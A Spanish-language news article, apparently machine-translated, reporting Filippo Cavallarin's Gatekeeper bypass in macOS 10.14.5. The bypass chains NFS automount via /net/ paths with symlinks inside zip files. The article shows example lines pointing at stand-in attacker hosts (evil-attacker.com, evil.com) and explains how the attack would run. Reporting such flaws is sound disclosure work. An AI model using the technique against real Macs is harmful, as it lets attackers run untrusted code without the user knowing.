Una vulnerabilidad no parcheada en macOS 10.14.5 también conocido como Mojave fue descubierto recientemente. La falla podría permitir a un atacante ejecutar código arbitrario sin la necesidad de interacción del usuario, evitando así Gatekeeper.
Este descubrimiento viene de investigador Filippo Cavallarin del Segmento, una compañía de seguridad cibernética con sede en Italia. "En MacOS X versión <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,”Escribió el investigador.
¿Cómo es posible el bypass Gatekeeper?
Primero, cabe señalar que es en el diseño del controlador de acceso a aceptar tanto duros externos y recursos compartidos de red como lugar seguro, permitiendo aplicaciones que contienen para funcionar sin problemas. Sin embargo, juntando dos funciones legítimas de macOS, es posible engañar al guardián de puerta y su “comportamiento previsto".
Así, ¿cuáles son estas características? La primera de ellas permite a un usuario para montar automáticamente un recurso compartido de red simplemente aceptando un camino que comienza con “/ net /”:
Por ejemplo
ls /net/evil-attacker.com/sharedfolder/
hará que el sistema operativo lee el contenido de la ‘SharedFolder’ en el host remoto (evil-attacker.com) el uso de NFS.
La otra característica es de aproximadamente archivos zip que contienen enlaces simbólicos que apuntan a ubicaciones arbitrarias. Además, el software que descomprime los archivos zip en MacOS no realiza comprobaciones sobre los enlaces simbólicos antes de la creación de ellos, el investigador explicó.
¿Cómo sería una obra de ataque? Un atacante podría crear un archivo zip con un enlace simbólico a un punto final de montaje automático pirata informático controlado (ex Documentos -> /net/evil.com/Documents) y podría enviarlo a un sistema objetivo. El usuario descarga el archivo malicioso, y se extrae el archivo malicioso sin sospechar nada.
Ahora, la víctima se encuentra en una zona controlada por el atacante, pero la confianza de Gatekeeper, por lo que cualquier ejecutable controlado por el atacante puede ejecutar sin ningún tipo de advertencia. El Buscador de manera está diseñado (extensiones ex ocultar .app, ocultar ruta completa de la barra de título) hace que esta tecnica muy eficaz y difícil de detectar, el investigador observó.
También hay un demostración en video de cómo funciona esta derivación Gatekeeper.
Este no es el primer caso de macOS construir-en la protección a.k.a. Gatekeeper está omitiendo. En febrero de este año, los investigadores de seguridad de Trend Micro descubrieron que un archivo .exe de Windows malicioso puede infectar a los ordenadores Mac, y podría descargar malware Infostealer acompañado de adware en sus sistemas.
En ese caso, los archivos .exe fueron capaces de evadir la protección de Gatekeeper porque no fueron revisados por el software, diseñada para comprobar sólo los archivos de Mac nativas. Esto podría llevar a pasar por la verificación de la firma de código y verificación.
Milena Dimitrova
Un escritor inspirado y administrador de contenido que ha estado con SensorsTechForum desde que comenzó el proyecto.. Un profesional con 10+ años de experiencia en la creación de contenido atractivo. Centrado en la privacidad de los usuarios y el desarrollo de malware, ella cree firmemente en un mundo donde la seguridad cibernética juega un papel central. Si el sentido común no tiene sentido, ella estará allí para tomar notas. Esas notas pueden convertirse más tarde en artículos! Siga Milena @Milenyim
Sígueme: